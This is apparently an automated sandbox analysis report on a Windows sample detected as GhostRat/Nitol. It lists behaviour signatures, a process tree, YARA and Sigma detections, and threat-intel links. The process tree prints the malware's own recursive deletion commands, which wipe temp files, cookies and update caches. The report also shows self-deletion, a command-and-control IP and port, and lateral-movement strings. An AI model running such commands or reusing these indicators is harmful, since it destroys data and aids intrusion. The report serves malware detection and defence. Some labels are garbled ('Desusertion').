Edit tour

Windows Analysis Report
G3izWAY3Fa.exe

Overview

General Information

Sample name:	G3izWAY3Fa.exe renamed because original name is a hash value
Original sample name:	118F7F61B6AFB1DA5E94EA1740222C73.exe
Analysis ID:	1579781
MD5:	118f7f61b6afb1da5e94ea1740222c73
SHA1:	5a0d66ec18cdb3812bad259999cf64d051cefa8b
SHA256:	aaf88339c23080ffd423da3b03a229d220b55c5e007c1f413fbd3633c48aad44
Tags:	exeGh0stRATuser-abuse_ch
Infos:

Detection

GhostRat, Nitol

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Suspicious Double Extension File Execution

Suricata IDS alerts for network traffic

Yara detected GhostRat

Yara detected Nitol

AI detected suspicious sample

Checks if browser processes are running

Contain functionality to detect virtual machines

Contains functionality to capture and log keystrokes

Contains functionality to detect sleep reduction / modifications

Contains functionality to detect virtual machines (IN, VMware)

Contains functionality to enumerate network shares of other devices

Deletes itself after installation

Drops PE files with benign system names

Drops executables to the windows directory (C:\Windows) and starts them

Found evasive API chain (may stop execution after checking mutex)

Found stalling execution ending in API Sleep call

Machine Learning detection for dropped file

Sigma detected: Files With System Process Name In Unsuspected Locations

AV process strings found (often used to terminate AV products)

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to clear windows event logs (to hide its activities)

Contains functionality to communicate with device drivers

Contains functionality to delete services

Contains functionality to download and execute PE files

Contains functionality to download and launch executables

Contains functionality to dynamically determine API calls

Contains functionality to enumerate running services

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to query network adapater information

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates processes with suspicious names

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found evasive API chain (may stop execution after checking a module file name)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May check if the current machine is a sandbox (GetTickCount - Sleep)

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries keyboard layouts

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Communication To Uncommon Desusertion Ports

Sigma detected: Uncommon Svchost Parent Process

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Too many similar processes found

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

G3izWAY3Fa.exe (PID: 7380 cmdline: "C:\Users\user\Desktop\G3izWAY3Fa.exe" MD5: 118F7F61B6AFB1DA5E94EA1740222C73)

v5.exe (PID: 7460 cmdline: "C:\Windows\temp\v5.exe" MD5: 48A02F4A003E8CBE683CF5DADA237168)

cmd.exe (PID: 7596 cmdline: "C:\Windows\system32\cmd.exe" /c del C:\Windows\temp\v5.exe > nul MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

server.exe (PID: 7472 cmdline: "C:\Windows\temp\server.exe" MD5: 8A953A49796B7F8C7539A6B2BC175397)

svchost.exe (PID: 7844 cmdline: "C:\Windows\system32\033726\svchost.exe" MD5: 00C090DAE3EE360E575655FE89121D83)

svchost.exe (PID: 8032 cmdline: "C:\Windows\system32\034031\svchost.exe" MD5: B573CCA4145727C22E1AD6774DBF3705)

.exe (PID: 7512 cmdline: "C:\Windows\temp\ .exe" MD5: CCEE0912E79D434F0D2C1E11274F23C0)

cmd.exe (PID: 2832 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6944 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2156 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6424 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2008 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7584 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7388 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7604 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 1080 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 652 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3892 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2992 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3632 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7940 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3896 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2292 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2520 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3336 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5780 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5564 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 4460 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 1008 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7400 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5588 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5216 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6836 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3848 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6696 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7788 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7408 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 4452 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5228 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

v5.exe (PID: 7484 cmdline: C:\Windows\temp\v5.exe MD5: 48A02F4A003E8CBE683CF5DADA237168)

svchsot.exe (PID: 8104 cmdline: "C:\Windows\XXXXXX05CA35CC\svchsot.exe" MD5: 8A953A49796B7F8C7539A6B2BC175397)

svchsot.exe (PID: 4848 cmdline: "C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe" MD5: 00C090DAE3EE360E575655FE89121D83)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Nitol		No Attribution	https://asec.ahnlab.com/en/44504/ https://blogs.technet.microsoft.com/microsoft_blog/2012/09/13/microsoft-disrupts-the-emerging-nitol-botnet-being-spread-through-an-unsecure-supply-chain/ https://en.wikipedia.org/wiki/Nitol_botnet https://krebsonsecurity.com/tag/nitol/	https://malpedia.caad.fkie.fraunhofer.de/details/win.nitol

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
dump.pcap	gh0st	unknown	https://github.com/jackcr/	0x3d4ef:$a: 47 68 30 73 74 A6 00 00 00 18 01 00 00 78 9C 0x3d972:$a: 47 68 30 73 74 16 00 00 00 01 00 00 00 78 9C

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
00000008.00000002.2706650103.000000001007A000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
0000000B.00000002.1452368472.000000001007A000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
00000003.00000002.2681095838.0000000000650000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000003.00000002.2681095838.0000000000650000.00000004.00001000.00020000.00000000.sdmp	gh0st	unknown	https://github.com/jackcr/	0x0:$a: 47 68 30 73 74 A6 00 00 00 18 01 00 00 78 9C
00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
0000000D.00000002.1534647455.000000001007A000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
00000003.00000002.2705358503.0000000002A5D000.00000004.00000010.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000003.00000002.2705358503.0000000002A5D000.00000004.00000010.00020000.00000000.sdmp	gh0st	unknown	https://github.com/jackcr/	0xf08:$a: 47 68 30 73 74 16 00 00 00 01 00 00 00 78 9C
0000000A.00000002.1431291554.000000001007A000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
Process Memory Space: server.exe PID: 7472	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
Process Memory Space: svchost.exe PID: 7844	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
Process Memory Space: svchost.exe PID: 8032	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
Process Memory Space: svchsot.exe PID: 8104	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
Process Memory Space: svchsot.exe PID: 4848	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.v5.exe.400000.0.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
2.2.v5.exe.400000.0.unpack	Backdoor_Nitol_Jun17	Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader	Florian Roth	0x1e13:$x1: User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01) 0x1eb0:$x1: User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01) 0x203b:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1) 0x21a3:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1) 0x1b60:$s2: %c%c%c%c%c%c.exe 0x2003:$s5: Accept-Language: zh-cn 0x216b:$s5: Accept-Language: zh-cn 0x22cf:$s5: Accept-Language: zh-cn
2.2.v5.exe.400000.0.unpack	ZxShell_Related_Malware_CN_Group_Jul17_2	Detects a ZxShell related sample from a CN threat group	Florian Roth	0x1e13:$u1: User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01) 0x1eb0:$u1: User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01) 0x203b:$u2: User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1) 0x21a3:$u2: User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1) 0x1cf0:$u3: User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0 0x2307:$u4: User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) 0x172c:$x1: \\%s\admin$\g1fd.exe 0x1764:$x2: C:\g1fd.exe 0x174c:$x3: \\%s\C$\NewArean.exe 0x17d0:$s0: at \\%s %d:%d %s 0x19f0:$s1: %c%c%c%c%ccn.exe 0x1a58:$s1: %c%c%c%c%ccn.exe 0x1ad4:$s1: %c%c%c%c%ccn.exe 0x1970:$s2: hra%u.dll 0x1b20:$s2: hra%u.dll 0x1b54:$s2: hra%u.dll 0x1d61:$s3: Referer: http://%s:80/http://%s 0x2003:$s5: Accept-Language: zh-cn 0x216b:$s5: Accept-Language: zh-cn 0x22cf:$s5: Accept-Language: zh-cn
2.2.v5.exe.400000.0.unpack	CN_disclosed_20180208_Mal1	Detects malware from disclosed CN malware set	Florian Roth	0x2307:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
2.2.v5.exe.400000.0.unpack	MAL_Nitol_Malware_Jan19_1	Detects Nitol Malware	Florian Roth	0x239c:$xc2: GET ^&&%$%$^ 0x23cd:$xc2: GET ^&&%$%$^ 0x23fe:$xc2: GET ^&&%$%$^ 0x242f:$xc2: GET ^&&%$%$^ 0x2460:$xc2: GET ^&&%$%$^ 0x2491:$xc2: GET ^&&%$%$^ 0x24c2:$xc2: GET ^&&%$%$^ 0x24f3:$xc2: GET ^&&%$%$^ 0x2524:$xc2: GET ^&&%$%$^ 0x2555:$xc2: GET ^&&%$%$^ 0x2586:$xc2: GET ^&&%$%$^ 0x25b7:$xc2: GET ^&&%$%$^ 0x25e8:$xc2: GET ^&&%$%$^ 0x2619:$xc2: GET ^&&%$%$^ 0x264a:$xc2: GET ^&&%$%$^ 0x267b:$xc2: GET ^&&%$%$^ 0x26ac:$xc2: GET ^&&%$%$^ 0x26dd:$xc2: GET ^&&%$%$^ 0x270e:$xc2: GET ^&&%$%$^ 0x273f:$xc2: GET ^&&%$%$^ 0x23c9:$n1: .htmGET
4.2.v5.exe.400000.0.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
4.2.v5.exe.400000.0.unpack	Backdoor_Nitol_Jun17	Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader	Florian Roth	0x1e13:$x1: User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01) 0x1eb0:$x1: User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01) 0x203b:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1) 0x21a3:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1) 0x1b60:$s2: %c%c%c%c%c%c.exe 0x2003:$s5: Accept-Language: zh-cn 0x216b:$s5: Accept-Language: zh-cn 0x22cf:$s5: Accept-Language: zh-cn
4.2.v5.exe.400000.0.unpack	ZxShell_Related_Malware_CN_Group_Jul17_2	Detects a ZxShell related sample from a CN threat group	Florian Roth	0x1e13:$u1: User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01) 0x1eb0:$u1: User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01) 0x203b:$u2: User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1) 0x21a3:$u2: User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1) 0x1cf0:$u3: User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0 0x2307:$u4: User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) 0x172c:$x1: \\%s\admin$\g1fd.exe 0x1764:$x2: C:\g1fd.exe 0x174c:$x3: \\%s\C$\NewArean.exe 0x17d0:$s0: at \\%s %d:%d %s 0x19f0:$s1: %c%c%c%c%ccn.exe 0x1a58:$s1: %c%c%c%c%ccn.exe 0x1ad4:$s1: %c%c%c%c%ccn.exe 0x1970:$s2: hra%u.dll 0x1b20:$s2: hra%u.dll 0x1b54:$s2: hra%u.dll 0x1d61:$s3: Referer: http://%s:80/http://%s 0x2003:$s5: Accept-Language: zh-cn 0x216b:$s5: Accept-Language: zh-cn 0x22cf:$s5: Accept-Language: zh-cn
4.2.v5.exe.400000.0.unpack	CN_disclosed_20180208_Mal1	Detects malware from disclosed CN malware set	Florian Roth	0x2307:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
4.2.v5.exe.400000.0.unpack	MAL_Nitol_Malware_Jan19_1	Detects Nitol Malware	Florian Roth	0x239c:$xc2: GET ^&&%$%$^ 0x23cd:$xc2: GET ^&&%$%$^ 0x23fe:$xc2: GET ^&&%$%$^ 0x242f:$xc2: GET ^&&%$%$^ 0x2460:$xc2: GET ^&&%$%$^ 0x2491:$xc2: GET ^&&%$%$^ 0x24c2:$xc2: GET ^&&%$%$^ 0x24f3:$xc2: GET ^&&%$%$^ 0x2524:$xc2: GET ^&&%$%$^ 0x2555:$xc2: GET ^&&%$%$^ 0x2586:$xc2: GET ^&&%$%$^ 0x25b7:$xc2: GET ^&&%$%$^ 0x25e8:$xc2: GET ^&&%$%$^ 0x2619:$xc2: GET ^&&%$%$^ 0x264a:$xc2: GET ^&&%$%$^ 0x267b:$xc2: GET ^&&%$%$^ 0x26ac:$xc2: GET ^&&%$%$^ 0x26dd:$xc2: GET ^&&%$%$^ 0x270e:$xc2: GET ^&&%$%$^ 0x273f:$xc2: GET ^&&%$%$^ 0x23c9:$n1: .htmGET
Click to see the 5 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Double Extension File Execution

Source: Process started

Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\temp\ .exe" , CommandLine: "C:\Windows\temp\ .exe" , CommandLine|base64offset|contains: , Image: C:\Windows\Temp\ .exe, NewProcessName: C:\Windows\Temp\ .exe, OriginalFileName: C:\Windows\Temp\ .exe, ParentCommandLine: "C:\Users\user\Desktop\G3izWAY3Fa.exe", ParentImage: C:\Users\user\Desktop\G3izWAY3Fa.exe, ParentProcessId: 7380, ParentProcessName: G3izWAY3Fa.exe, ProcessCommandLine: "C:\Windows\temp\ .exe" , ProcessId: 7512, ProcessName: .exe

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\Temp\server.exe, ProcessId: 7472, TargetFilename: C:\Windows\SysWOW64\033726\svchost.exe

Sigma detected: Communication To Uncommon Desusertion Ports

Source: Network Connection

Author: Florian Roth (Nextron Systems): Data: DesusertionIp: 120.48.34.233, DesusertionIsIpv6: false, DesusertionPort: 8080, EventID: 3, Image: C:\Windows\Temp\v5.exe, Initiated: true, ProcessId: 7484, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49713

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\033726\svchost.exe" , CommandLine: "C:\Windows\system32\033726\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\033726\svchost.exe, NewProcessName: C:\Windows\SysWOW64\033726\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\033726\svchost.exe, ParentCommandLine: "C:\Windows\temp\server.exe" , ParentImage: C:\Windows\Temp\server.exe, ParentProcessId: 7472, ParentProcessName: server.exe, ProcessCommandLine: "C:\Windows\system32\033726\svchost.exe" , ProcessId: 7844, ProcessName: svchost.exe

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Source: Registry Key set

